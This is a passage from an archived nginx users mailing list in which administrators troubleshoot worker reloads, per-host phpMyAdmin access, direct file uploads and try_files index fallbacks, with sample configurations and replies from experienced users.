> > http://mailman.nginx.org/mailman/listinfo/nginx
>
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx

-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From nginx-forum at forum.nginx.org Sat Oct 8 15:05:38 2016 From: nginx-forum at forum.nginx.org (nixcoder) Date: Sat, 08 Oct 2016 11:05:38 -0400 Subject: 400 bad request for http m-post method In-Reply-To: <20161005152545.GU73038@mdounin.ru> References: <20161005152545.GU73038@mdounin.ru> Message-ID: <1edee87adc666ded971653ebdd08331e.NginxMailingListEnglish@forum.nginx.org>

Awesome!! Thanks a lot, Maxim.
The patch fixed the issue. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270087,270129#msg-270129 From reallfqq-nginx at yahoo.fr Sat Oct 8 17:26:57 2016 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Sat, 8 Oct 2016 19:26:57 +0200 Subject: Nginx old worker process not exiting on reload In-Reply-To: References: <74BB23D7-FF1F-460D-8543-31BEC864C2D3@gmail.com> Message-ID: RTFM? http://nginx.org/en/docs/control.html --- *B. R.* On Sat, Oct 8, 2016 at 7:34 AM, Sharan J wrote: > Hi, > > Is there a way to prevent this? Is there any other way to kill such > process without the need for rebooting the machine. > > Thanks, > Santhakumari > > On Wed, Oct 5, 2016 at 4:35 PM, Philip Walenta > wrote: > >> The only thing I ever experienced that would hold an old worker process >> open after a restart (in my case config reload) were websocket connections. >> >> Sent from my iPhone >> >> > On Oct 5, 2016, at 5:59 AM, Sharan J wrote: >> > >> > Hi, >> > >> > While reloading nginx, sometimes old worker process are not exiting >> thereby, entering into "uninterrupted sleep" state. Is there a way to kill >> such abandoned worker process? How can this process be avoided? >> > We are using nginx-1.10.1 >> > >> > Thanks, >> > Santhakumari.V >> > _______________________________________________ >> > nginx mailing list >> > nginx at nginx.org >> > http://mailman.nginx.org/mailman/listinfo/nginx >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Sun Oct 9 15:48:33 2016 From: francis at daoine.org (Francis Daly) Date: Sun, 9 Oct 2016 16:48:33 +0100 Subject: Allow PHPMyAdmin access on certain virtual hosts - Ubuntu and Nginx In-Reply-To: References: <20161007133319.GU11677@daoine.org> Message-ID: <20161009154833.GV11677@daoine.org> On Fri, Oct 07, 2016 at 10:20:51AM -0400, mrast wrote: Hi there, There are many ways that you might have configured things. Only you know the one way that you have configured things. Until you share that, there is not much that others can do. > If i remove the /phpmyadmin section from website1 config file, it just > removes the pre-auth login box and goes straight to the main phpma screen. When you do that, what is the actual url that your browser has requested? It will start with http:// or https://, then it will have website1.com -- I don't care about those bits. Then it will have a /, and then something, and then maybe a ? or a # and something else. The "/something" is the bit that matters here. > I have a symlink for nginx to use phpmyadmin /usr/share/phpmyadmin > /usr/share/nginx/html > > I have a symlink in website2 and 4 directory's for /usr/share/phpmyadmin I am not sure what you mean by that; it may not matter at least until the request and matching config is identified. If you have a new-enough nginx, then nginx -T | grep 'server\|location' may hide enough of the config that you are willing to show the output. Only the "website1" piece is interesting here. And this assumes that there are no directives from the "rewrite" module that will take effect first. Given the "location"s that are defined, and given the request that you make, what one "location" will nginx use to handle the request? 
That is a place to consider making a change. Cheers, f -- Francis Daly francis at daoine.org From francis at daoine.org Sun Oct 9 16:05:07 2016 From: francis at daoine.org (Francis Daly) Date: Sun, 9 Oct 2016 17:05:07 +0100 Subject: Clientbodyinfileonly - POST request is discarded In-Reply-To: <8260e5aeb7dcb440714376bc3d0f2d37.NginxMailingListEnglish@forum.nginx.org> References: <20161004194642.GK11677@daoine.org> <8260e5aeb7dcb440714376bc3d0f2d37.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20161009160507.GW11677@daoine.org> On Fri, Oct 07, 2016 at 03:47:47PM -0400, yurai wrote: Hi there, > Unfortunately still it doesn't work as I expect - upload.txt file content is > not saved on server side in /tmp/nginx-client-body. Oh. Why do you expect that? I would only expect that to happen if I send the upload.txt file content, which I have not done yet. > My understanding is that transfer should be performed in 2 phases (2 POST > requests via 2x curl). Why? Each request is completely independent of each other request. If you want to tie two together, you must add the tying part yourself. (Or use a framework which does it for you). > First request should deliver file name, and second > should deliver actual file content without ingeration from backend side. I > analyzed HTTP flow in wireshark and it looks fine for me (details below). > > 1. curl --data-binary upload.txt http://localhost/upload > > - s1 listening on 80 recive POST request with body = "upload.txt". S1 buffer > "upload.txt" in /tmp/0000001, generate new POST request with field > X-FILE="/tmp/0000001" and pass this request to backend (s2) > - s2 listening on 8080 recieve POST request with X-FILE = "/tmp/0000001" > - s2 generate HTTP response 200 with body = "Do something sensible with > /tmp/0000001\n" and pass it to s1 > - s1 recieve above response and pass it to client > - client recieve HTTP response 200 with body = "Do something sensible with > /tmp/0000001\n" Yes, that is exactly what should happen. Except that you seem to have switched between /tmp and /tmp/nginx-client-body somewhere. > 2. curl --data-binary '@upload.txt' http://localhost/upload This should do exactly the same as the first one, except that now (because of what the curl client does) the POST data is not the string "upload.txt", but is instead the content of the file upload.txt. nginx has no idea that the content came from a file, or what that filename might have been. > If I understand this mechanism correctly now actual upload.txt transfer to > server without backend ingeration should be triggered. > So I should get reponse 200 and upload.txt content should be saved by server > under /tmp/nginx-client-body. You should get something like response 200 with body = "Do something sensible with /tmp/0000002\n", exactly the same format as the first response (but with a different filename.) nginx receives a POST with some body content. nginx writes that body content to a new file in its client_body_temp_path > Anyway when I type curl --data-binary '@upload.txt' http://localhost/upload > whole scenario from previous point is performed again. What is the filename that you get back in the response? What is the content of that file, when you look on the server? It looks to me like everything is working as intended. I have a file /tmp/nginx-client-body/0000000005 which contains the contents of my upload.txt, and I have a file /tmp/nginx-client-body/0000000004 which contains the 10 characters "upload.txt". 
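For reference, the front-end part of the setup that produces these files looks roughly like the following -- a sketch in the spirit of the linked article, not the poster's exact config; the temp path and header name are only examples:

location /upload {
    client_body_temp_path     /tmp/nginx-client-body;
    client_body_in_file_only  on;                 # always store the request body as a file, and keep it
    client_body_buffer_size   128k;
    client_max_body_size      1000m;

    proxy_set_header          X-FILE $request_body_file;  # pass only the file name upstream
    proxy_pass_request_body   off;                        # do not stream the body to the backend
    proxy_pass                http://127.0.0.1:8080/;
}

Each POST body is written to a numbered file under client_body_temp_path, and only that file name travels to the backend in the X-FILE header.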
If you do not have that, what specifically do you have instead? f -- Francis Daly francis at daoine.org From nginx-forum at forum.nginx.org Sun Oct 9 16:50:50 2016 From: nginx-forum at forum.nginx.org (mrast) Date: Sun, 09 Oct 2016 12:50:50 -0400 Subject: Allow PHPMyAdmin access on certain virtual hosts - Ubuntu and Nginx In-Reply-To: <20161009154833.GV11677@daoine.org> References: <20161009154833.GV11677@daoine.org> Message-ID: Hi Francis, Its a brand new server setup. I have no problem sharing the config files - ill just sanitize the actual websites. But everything else is 100% as is. Here is the full nginx.conf file from /etc/nginx cat /etc/nginx/nginx.conf user www-data; worker_processes 1; worker_rlimit_nofile 100000; pid /run/nginx.pid; events { worker_connections 1024; multi_accept on; } http { ## # EasyEngine Settings ## sendfile on; tcp_nopush on; tcp_nodelay on; keepalive_timeout 15; types_hash_max_size 2048; server_tokens off; reset_timedout_connection on; # add_header X-Powered-By "EasyEngine"; add_header rt-Fastcgi-Cache $upstream_cache_status; # Limit Request limit_req_status 403; limit_req_zone $binary_remote_addr zone=one:10m rate=1r/s; # Proxy Settings # set_real_ip_from proxy-server-ip; # real_ip_header X-Forwarded-For; fastcgi_read_timeout 300; client_max_body_size 100m; ## # SSL Settings ## ssl_session_cache shared:SSL:20m; ssl_session_timeout 10m; ssl_prefer_server_ciphers on; ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-DSS-AES128-GCM-SHA256:kEDH+AESGCM:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-DSS-AES128-SHA256:DHE-RSA-AES256-SHA256:DHE-DSS-AES256-SHA:DHE-RSA-AES256-SHA:ECDHE-RSA-DES-CBC3-SHA:ECDHE-ECDSA-DES-CBC3-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA256:AES256-SHA256:AES128-SHA:AES256-SHA:AES:CAMELLIA:DES-CBC3-SHA:!aNULL:!eNULL:!EXPORT:!DES:!RC4:!MD5:!PSK:!aECDH:!EDH-DSS-DES-CBC3-SHA:!EDH-RSA-DES-CBC3-SHA:!KRB5-DES-CBC3-SHA; ssl_protocols TLSv1 TLSv1.1 TLSv1.2; ## # Basic Settings ## # server_names_hash_bucket_size 64; # server_name_in_redirect off; include /etc/nginx/mime.types; default_type application/octet-stream; ## # Logging Settings ## access_log /var/log/nginx/access.log; error_log /var/log/nginx/error.log; # Log format Settings log_format rt_cache '$remote_addr $upstream_response_time $upstream_cache_status [$time_local] ' '$http_host "$request" $status $body_bytes_sent ' '"$http_referer" "$http_user_agent"'; ## # Gzip Settings ## gzip on; gzip_disable "msie6"; gzip_vary on; gzip_proxied any; gzip_comp_level 2; gzip_buffers 16 8k; gzip_http_version 1.1; gzip_types application/atom+xml application/javascript application/json application/rss+xml application/vnd.ms-fontobject application/x-font-ttf application/x-web-app-manifest+json application/xhtml+xml application/xml font/opentype image/svg+xml image/x-icon text/css text/plain text/x-component text/xml text/javascript; ## # Cache Settings ## add_header Fastcgi-Cache $upstream_cache_status; fastcgi_cache_key "$scheme$request_method$host$request_uri"; fastcgi_cache_use_stale error timeout invalid_header http_500; fastcgi_ignore_headers Cache-Control Expires Set-Cookie; ## # Virtual Host Configs ## include /etc/nginx/conf.d/*.conf; include /etc/nginx/sites-enabled/*; server { listen 80 
default_server; server_name _; return 444; } } Here is the full config for website.com - that does need access to phpmyadmin and does have an extra login prompt before /phpmyadmin is shown (which is what th e location /phpmyadmin block dictates cat /etc/nginx/sites-available/website.com fastcgi_cache_path /var/www/html/website.com/cache levels=1:2 keys_zone=website.com:100m inactive=60m; server { server_name website.com www.website.com; access_log /var/www/html/website.com/logs/access.log; error_log /var/www/html/website.com/logs/error.log; root /var/www/html/website.com/public/; index index.php index.html index.htm; set $skip_cache 0; if ($request_method = POST) { set $skip_cache 1; } if ($query_string != "") { set $skip_cache 1; } if ($request_uri ~* "/wp-admin/|/phpmyadmin|/xmlrpc.php|wp-.*.php|/feed/|index.php|sitemap(_index)?.xml") { set $skip_cache 1; } if ($http_cookie ~* "comment_author|wordpress_[a-f0-9]+|wp-postpass|wordpress_no_cache|wordpress_logged_in") { set $skip_cache 1; } if ($http_cookie ~* "PHPSESSID"){ set $skip_cache 1; } location / { try_files $uri $uri/ /index.php?$args; } location /phpmyadmin { auth_basic "Admin Login"; auth_basic_user_file /etc/nginx/allow_phpmyadmin; } location ~ \.php$ { try_files $uri =404; fastcgi_split_path_info ^(.+\.php)(/.+)$; fastcgi_pass unix:/var/run/php/php7.0-fpm.sock; fastcgi_index index.php; include fastcgi_params; fastcgi_cache_bypass $skip_cache; fastcgi_no_cache $skip_cache; fastcgi_cache magentafp.com; fastcgi_cache_valid 60m; } location ~ /purge(/.*) { fastcgi_cache_purge website.com "$scheme$request_method$host$1"; } } Here is the full config for website1.com - that doesnt need access to phpmyadmin - and thus doesnt have the location /phpmyamin block in it cat /etc/nginx/sites-available/fulgent.co.uk fastcgi_cache_path /var/www/html/website1.com/cache levels=1:2 keys_zone=website1.com:100m inactive=60m; server { server_name website1.com www.website1.com; access_log /var/www/html/website1.com/logs/access.log; error_log /var/www/html/website1.com/logs/error.log; root /var/www/html/website1.com/public/; index index.php index.html index.htm; set $skip_cache 0; if ($request_method = POST) { set $skip_cache 1; } if ($query_string != "") { set $skip_cache 1; } if ($request_uri ~* "/wp-admin/|/phpmyadmin|/xmlrpc.php|wp-.*.php|/feed/|index.php|sitemap(_index)?.xml") { set $skip_cache 1; } if ($http_cookie ~* "comment_author|wordpress_[a-f0-9]+|wp-postpass|wordpress_no_cache|wordpress_logged_in") { set $skip_cache 1; } if ($http_cookie ~* ?PHPSESSID"){ set $skip_cache 1; } location / { try_files $uri $uri/ /index.php?$args; } location ~ \.php$ { try_files $uri =404; fastcgi_split_path_info ^(.+\.php)(/.+)$; fastcgi_pass unix:/var/run/php/php7.0-fpm.sock; fastcgi_index index.php; include fastcgi_params; fastcgi_cache_bypass $skip_cache; fastcgi_no_cache $skip_cache; fastcgi_cache magentafp.com; fastcgi_cache_valid 60m; } location ~ /purge(/.*) { fastcgi_cache_purge website1.com "$scheme$request_method$host$1"; } } I have made no changes to any phpmyadmin config files. If i go to website1.com/phpmyadmin - the phpmyadmin login page is served. There are no changes to the url - it stays website1.com/phpmyadmin This is the article i followd to install an secure phpmyadmin - i did everything on that page except change the /phpmyadmin location name. (this is where the symlink came into it) So to me that symlink tells nginx too server phpmyadmin php pages for the web server - am i correct? 
If i remove that symlink - and then just create symlinks for the websites themselves - ive found it doesnt make a difference. eg - a symlink for website.com exisits pointing to /usr/share/phpmyadmin. So im telling nginx to serve phpmyadmin php files for that website only and not the whole server which the /usr/share/phpmyadmin /usr/share/nginx/html symlink does. Here is the output of nginx -T | grep 'server\|location' as requested (ive cut out website2 and website3 bits as they are not relevant as they are just copies of .com and 1.com (.com and 2.com need access 1.com and 3.com dont nginx: the configuration file /etc/nginx/nginx.conf syntax is ok nginx: configuration file /etc/nginx/nginx.conf test is successful server_tokens off; # set_real_ip_from proxy-server-ip; ssl_prefer_server_ciphers on; # server_names_hash_bucket_size 64; # server_name_in_redirect off; server { listen 80 default_server; server_name _; # server { # server { server { server_name website.com www.website.com; location / { location /phpmyadmin { location ~ \.php$ { location ~ /purge(/.*) { fastcgi_param SERVER_PROTOCOL $server_protocol; fastcgi_param SERVER_ADDR $server_addr; fastcgi_param SERVER_PORT $server_port; fastcgi_param SERVER_NAME $server_name; server { server_name website1.com www.website1.com; location / { location ~ \.php$ { location ~ /purge(/.*) { fastcgi_param SERVER_PROTOCOL $server_protocol; fastcgi_param SERVER_ADDR $server_addr; fastcgi_param SERVER_PORT $server_port; fastcgi_param SERVER_NAME $server_name; Thanks for your assistance. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270105,270134#msg-270134 From francis at daoine.org Sun Oct 9 19:41:34 2016 From: francis at daoine.org (Francis Daly) Date: Sun, 9 Oct 2016 20:41:34 +0100 Subject: Allow PHPMyAdmin access on certain virtual hosts - Ubuntu and Nginx In-Reply-To: References: <20161009154833.GV11677@daoine.org> Message-ID: <20161009194134.GX11677@daoine.org> On Sun, Oct 09, 2016 at 12:50:50PM -0400, mrast wrote: Hi there, > I have no problem sharing the config files - ill just sanitize the actual > websites. But everything else is 100% as is. Thanks for this - it does give more information about what is happening. A few notes, with the order switched... > if ($http_cookie ~* ?PHPSESSID"){ If that is a copy-paste of the config file, then it probably won't match some things that you would want it to. > If i go to website1.com/phpmyadmin - the phpmyadmin login page is served. > There are no changes to the url - it stays website1.com/phpmyadmin That piece surprises me. I would expect that it would have issued a redirect to website1.com/phpmyadmin/ That is because, for website1, with the following: > location / { > location ~ \.php$ { > location ~ /purge(/.*) { a request for /phpmyadmin is handled in the first location, which has > try_files $uri $uri/ /index.php?$args; which, since you have > root /var/www/html/website1.com/public/; should check if /var/www/html/website1.com/public//phpmyadmin is a file, and if so serve it; else check if /var/www/html/website1.com/public//phpmyadmin is a directory, and if so serve a redirect to /phpmyadmin/ Oh - unless /var/www/html/website1.com/public//phpmyadmin does not exist, in which case it will be handled internally to nginx as a subrequest to /index.php That makes sense now -- I'm guessing that that path does not exist? 
Your /index.php subrequest is handled in the second location, which does

> try_files $uri =404;
> fastcgi_pass unix:/var/run/php/php7.0-fpm.sock;
> include fastcgi_params;

where try_files checks that the file /var/www/html/website1.com/public//index.php exists, and then contacts your fastcgi server and asks it to process a file.

That is probably "SCRIPT_FILENAME" in your fastcgi_params file -- what is that set to? Most likely it is $document_root$fastcgi_script_name, which corresponds to the file /var/www/html/website1.com/public//index.php

What happens next is outside of the control of nginx, and is entirely down to your fastcgi server and whatever that php file contains.

> Here is the full config for website.com - that does need access to
> phpmyadmin and does have an extra login prompt before /phpmyadmin is shown
> (which is what th e location /phpmyadmin block dictates

Just as an aside - it is possible that some other configuration will protect against this; but it looks to me as though if you access http://website.com/phpmyadmin/index.php you may get access to things without having attempted the nginx basic authentication "extra login" step.

> This is the article i followd to install an secure phpmyadmin - i did
> everything on that page except change the /phpmyadmin location name. (this
> is where the symlink came into it)

The link to the article seems to be missing.

I'm not sure what exactly this symlink is. For each of the files/directories named above that "try_files" tests, what does "ls -lLd" say that they are? File, directory, or not there?

> So to me that symlink tells nginx too server phpmyadmin php pages for the
> web server - am i correct?

nginx does not "do" php. If php is involved, it is your fastcgi server that handles it. nginx will tell your fastcgi server which file it should attempt to process, though.

If the symlink you refer to is one of

/var/www/html/website1.com/public//phpmyadmin
/var/www/html/website1.com/public//index.php

then it will be relevant; if not then it should not be.

> eg - a symlink for website.com exisits pointing to /usr/share/phpmyadmin. So
> im telling nginx to serve phpmyadmin php files for that website only and not
> the whole server which the /usr/share/phpmyadmin /usr/share/nginx/html
> symlink does.

In the config that you have shown, /usr/share/nginx/html is not relevant, I think.

> Here is the output of nginx -T | grep 'server\|location' as requested (ive
> cut out website2 and website3 bits as they are not relevant as they are just
> copies of .com and 1.com (.com and 2.com need access 1.com and 3.com dont

> server {
> server_name website.com www.website.com;
> location / {
> location /phpmyadmin {
> location ~ \.php$ {
> location ~ /purge(/.*) {

> server {
> server_name website1.com www.website1.com;
> location / {
> location ~ \.php$ {
> location ~ /purge(/.*) {

Those are the initially-important bits.

For each request (or internal subrequest), you can tell which one location nginx will use to handle it. Only the configuration in, or inherited into, that location is relevant for this request.

From the above, I think that the file /var/www/html/website1.com/public//index.php may be especially interesting. What is in it? Is it in any way related to phpmyadmin?

Good luck with it,

f
-- 
Francis Daly        francis at daoine.org

From me at myconan.net Mon Oct 10 03:56:57 2016 From: me at myconan.net (Edho Arief) Date: Mon, 10 Oct 2016 12:56:57 +0900 Subject: Index fallback?
Message-ID: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com>

I somehow can't make this scenario work:

root structure:
/a/index.html
/b/ <-- no index.html

accessing:
1. site.com/a -> redirect to site.com/a/ -> show /a/index.html
2. site.com/b -> redirect to site.com/b/ -> show @fallback

Using

try_files $uri $uri/index.html @fallback;

doesn't work quite well, because #1 becomes this instead:

1. site.com/a -> show /a/index.html

and that breaks relative-path javascript/css files (because it's `/a` in the browser, not `/a/`).

Using

try_files $uri @fallback;

just always shows @fallback for both scenarios. Whereas

try_files $uri $uri/ @fallback;

always returns 403 for #2, because the directory exists and there's no index.

As a side note,

error_page 404 = @fallback;

wouldn't work because, as mentioned above, #2 returns 403 (directory exists, no index), not 404.

Is there any way to do it without specifying a separate location for each of them?

From me at myconan.net Mon Oct 10 06:08:27 2016 From: me at myconan.net (Edho Arief) Date: Mon, 10 Oct 2016 15:08:27 +0900 Subject: Index fallback? In-Reply-To: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com> References: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com> Message-ID: <1476079707.2470157.750840969.0522FF19@webmail.messagingengine.com>

Hi,

On Mon, Oct 10, 2016, at 12:56, Edho Arief wrote:
> I somehow can't make this scenario work:
>
> root structure:
> /a/index.html
> /b/ <-- no index.html
>
> accessing:
> 1. site.com/a -> redirect to site.com/a/ -> show /a/index.html
> 2. site.com/b -> redirect to site.com/b/ -> show @fallback
>

After trying out a bit more, this is the closest thing I can make work:

location / {
    error_page 418 = @dirlist;

    set $redirect 0;

    if (-d $request_filename) {
        set $redirect A;
    }

    if (-f $request_filename/index.html) {
        set $redirect "${redirect}B";
    }

    if ($uri !~ /$) {
        set $redirect "${redirect}C";
    }

    if ($redirect = ABC) {
        return 302 $uri/$is_args$args;
    }

    if ($redirect = A) {
        return 418;
    }
}

Honestly speaking, it looks terrible. It would help if someone could point me to a better solution.

From me at myconan.net Mon Oct 10 06:19:15 2016 From: me at myconan.net (Edho Arief) Date: Mon, 10 Oct 2016 15:19:15 +0900 Subject: Index fallback?
In-Reply-To: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com> References: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com> Message-ID: <20161010062327.GZ11677@daoine.org> On Mon, Oct 10, 2016 at 12:56:57PM +0900, Edho Arief wrote: Hi there, untested, but... > accessing: > 1. site.com/a -> redirect to site.com/a/ -> show /a/index.html > 2. site.com/b -> redirect to site.com/b/ -> show @fallback > As a side note, > > error_page 404 = @fallback; > > Wouldn't work because as mentioned in the previous one, it returns 403 > for #2 (directory exists, no index), not 404. Would "error_page 403" Do The Right Thing? (It may be that it matches more than you want it to, of course.) f -- Francis Daly francis at daoine.org From me at myconan.net Mon Oct 10 06:25:49 2016 From: me at myconan.net (Edho Arief) Date: Mon, 10 Oct 2016 15:25:49 +0900 Subject: Index fallback? In-Reply-To: <20161010062327.GZ11677@daoine.org> References: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com> <20161010062327.GZ11677@daoine.org> Message-ID: <1476080749.2472762.750851769.43375E18@webmail.messagingengine.com> Hi, On Mon, Oct 10, 2016, at 15:23, Francis Daly wrote: > On Mon, Oct 10, 2016 at 12:56:57PM +0900, Edho Arief wrote: > > Hi there, > > untested, but... > > > accessing: > > 1. site.com/a -> redirect to site.com/a/ -> show /a/index.html > > 2. site.com/b -> redirect to site.com/b/ -> show @fallback > > > As a side note, > > > > error_page 404 = @fallback; > > > > Wouldn't work because as mentioned in the previous one, it returns 403 > > for #2 (directory exists, no index), not 404. > > Would "error_page 403" Do The Right Thing? > > (It may be that it matches more than you want it to, of course.) > Yeah, it matches a bit too much. From nurahmadie at gmail.com Mon Oct 10 06:29:09 2016 From: nurahmadie at gmail.com (Nurahmadie Nurahmadie) Date: Mon, 10 Oct 2016 13:29:09 +0700 Subject: Index fallback? In-Reply-To: <1476080355.2471742.750846529.0BEBE20A@webmail.messagingengine.com> References: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com> <1476079707.2470157.750840969.0522FF19@webmail.messagingengine.com> <1476080355.2471742.750846529.0BEBE20A@webmail.messagingengine.com> Message-ID: Hi On Mon, Oct 10, 2016 at 1:19 PM, Edho Arief wrote: > Made a bit more compact but still using ifs. > > location / { > location ~ /$ { > error_page 418 = @dirlist; > > if (-d $request_filename) { > set $index_fallback A; > } > > if (!-f $request_filename/index.html) { > set $index_fallback "${index_fallback}B"; > } > > if ($index_fallback = AB) { > return 418; > } > } > } > > On Mon, Oct 10, 2016, at 15:08, Edho Arief wrote: > > Hi, > > > > On Mon, Oct 10, 2016, at 12:56, Edho Arief wrote: > > > I somehow can't make this scenario work: > > > > > > root structure: > > > /a/index.html > > > /b/ <-- no index.html > > > > > > accessing: > > > 1. site.com/a -> redirect to site.com/a/ -> show /a/index.html > > > 2. 
site.com/b -> redirect to site.com/b/ -> show @fallback > > > > > > > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > Still need more locations, but independent to directories you want to access: server { listen 7770; root /tmp; autoindex on; autoindex_format json; } server { listen 80; server_name localhost; index index.html; root /tmp; location ~ /.*?[^/]$ { try_files $uri @redir; } location @redir { return 301 $uri/; } location ~ /$ { try_files $uri"index.html" @reproxy; } location @reproxy { proxy_pass http://localhost:7770; } } -- regards, Nurahmadie -- -------------- next part -------------- An HTML attachment was scrubbed... URL: From me at myconan.net Mon Oct 10 06:39:56 2016 From: me at myconan.net (Edho Arief) Date: Mon, 10 Oct 2016 15:39:56 +0900 Subject: Index fallback? In-Reply-To: References: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com> <1476079707.2470157.750840969.0522FF19@webmail.messagingengine.com> <1476080355.2471742.750846529.0BEBE20A@webmail.messagingengine.com> Message-ID: <1476081596.2475034.750857289.6EC29041@webmail.messagingengine.com> Hi, On Mon, Oct 10, 2016, at 15:29, Nurahmadie Nurahmadie wrote: > Hi > > > On Mon, Oct 10, 2016, at 15:08, Edho Arief wrote: > > > Hi, > > > > > > On Mon, Oct 10, 2016, at 12:56, Edho Arief wrote: > > > > I somehow can't make this scenario work: > > > > > > > > root structure: > > > > /a/index.html > > > > /b/ <-- no index.html > > > > > > > > accessing: > > > > 1. site.com/a -> redirect to site.com/a/ -> show /a/index.html > > > > 2. site.com/b -> redirect to site.com/b/ -> show @fallback > > > > > > Still need more locations, but independent to directories you want to > access: > > > server { > listen 7770; > root /tmp; > autoindex on; > autoindex_format json; > } > > server { > listen 80; > server_name localhost; > index index.html; > root /tmp; > > location ~ /.*?[^/]$ { > try_files $uri @redir; > } > > location @redir { > return 301 $uri/; > } > > location ~ /$ { > try_files $uri"index.html" @reproxy; > } > > location @reproxy { > proxy_pass http://localhost:7770; > } > } > Thanks, but that's even longer than my ifs. Also one `server { }` and one regexp location too many. From nurahmadie at gmail.com Mon Oct 10 06:50:15 2016 From: nurahmadie at gmail.com (Nurahmadie Nurahmadie) Date: Mon, 10 Oct 2016 13:50:15 +0700 Subject: Index fallback? In-Reply-To: <1476081596.2475034.750857289.6EC29041@webmail.messagingengine.com> References: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com> <1476079707.2470157.750840969.0522FF19@webmail.messagingengine.com> <1476080355.2471742.750846529.0BEBE20A@webmail.messagingengine.com> <1476081596.2475034.750857289.6EC29041@webmail.messagingengine.com> Message-ID: Hi, On Mon, Oct 10, 2016 at 1:39 PM, Edho Arief wrote: > Hi, > > On Mon, Oct 10, 2016, at 15:29, Nurahmadie Nurahmadie wrote: > > Hi > > > > > On Mon, Oct 10, 2016, at 15:08, Edho Arief wrote: > > > > Hi, > > > > > > > > On Mon, Oct 10, 2016, at 12:56, Edho Arief wrote: > > > > > I somehow can't make this scenario work: > > > > > > > > > > root structure: > > > > > /a/index.html > > > > > /b/ <-- no index.html > > > > > > > > > > accessing: > > > > > 1. site.com/a -> redirect to site.com/a/ -> show /a/index.html > > > > > 2. 
site.com/b -> redirect to site.com/b/ -> show @fallback > > > > > > > > > Still need more locations, but independent to directories you want to > > access: > > > > > > server { > > listen 7770; > > root /tmp; > > autoindex on; > > autoindex_format json; > > } > > > > server { > > listen 80; > > server_name localhost; > > index index.html; > > root /tmp; > > > > location ~ /.*?[^/]$ { > > try_files $uri @redir; > > } > > > > location @redir { > > return 301 $uri/; > > } > > > > location ~ /$ { > > try_files $uri"index.html" @reproxy; > > } > > > > location @reproxy { > > proxy_pass http://localhost:7770; > > } > > } > > > > Thanks, but that's even longer than my ifs. Also one `server { }` and > one regexp location too many. > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > Ah, sorry I thought it's obvious that the other server is just served as dummy example, also I have this tendency to avoid `if` as much as possible, so yeah -- regards, Nurahmadie -- -------------- next part -------------- An HTML attachment was scrubbed... URL: From me at myconan.net Mon Oct 10 06:53:58 2016 From: me at myconan.net (Edho Arief) Date: Mon, 10 Oct 2016 15:53:58 +0900 Subject: Index fallback? In-Reply-To: References: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com> <1476079707.2470157.750840969.0522FF19@webmail.messagingengine.com> <1476080355.2471742.750846529.0BEBE20A@webmail.messagingengine.com> <1476081596.2475034.750857289.6EC29041@webmail.messagingengine.com> Message-ID: <1476082438.2478106.750867537.6C84B5C0@webmail.messagingengine.com> Hi, On Mon, Oct 10, 2016, at 15:50, Nurahmadie Nurahmadie wrote: > > > > > > Still need more locations, but independent to directories you want to > > > access: > > > > > > > > > server { > > > listen 7770; > > > root /tmp; > > > autoindex on; > > > autoindex_format json; > > > } > > > > > > server { > > > listen 80; > > > server_name localhost; > > > index index.html; > > > root /tmp; > > > > > > location ~ /.*?[^/]$ { > > > try_files $uri @redir; > > > } > > > > > > location @redir { > > > return 301 $uri/; > > > } > > > > > > location ~ /$ { > > > try_files $uri"index.html" @reproxy; > > > } > > > > > > location @reproxy { > > > proxy_pass http://localhost:7770; > > > } > > > } > > > > > > > Thanks, but that's even longer than my ifs. Also one `server { }` and > > one regexp location too many. > > > > Ah, sorry I thought it's obvious that the other server is just served as > dummy example, > also I have this tendency to avoid `if` as much as possible, so yeah > Looking again, that's actually the solution: location / { location ~ /$ { try_files $uri/index.html @dirlist; } } Thanks. From nginx-forum at forum.nginx.org Mon Oct 10 07:41:13 2016 From: nginx-forum at forum.nginx.org (yurai) Date: Mon, 10 Oct 2016 03:41:13 -0400 Subject: Clientbodyinfileonly - POST request is discarded In-Reply-To: <20161009160507.GW11677@daoine.org> References: <20161009160507.GW11677@daoine.org> Message-ID: Hello Francis, thank you for response. I just want to transfer big file on Nginx server inside POST request. I use method from: https://coderwall.com/p/swgfvw/nginx-direct-file-upload-without-passing-them-through-backend Whole my analysis and expectations are based on this article. Unfotunately this "clientbodyinfileonly" functionality is not well documented so I'm not sure how exactly ok scenario from Nginx POV should look like. 
I just know that my file is not transferred and not saved on the server side.

Regards, Dawid

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270063,270145#msg-270145

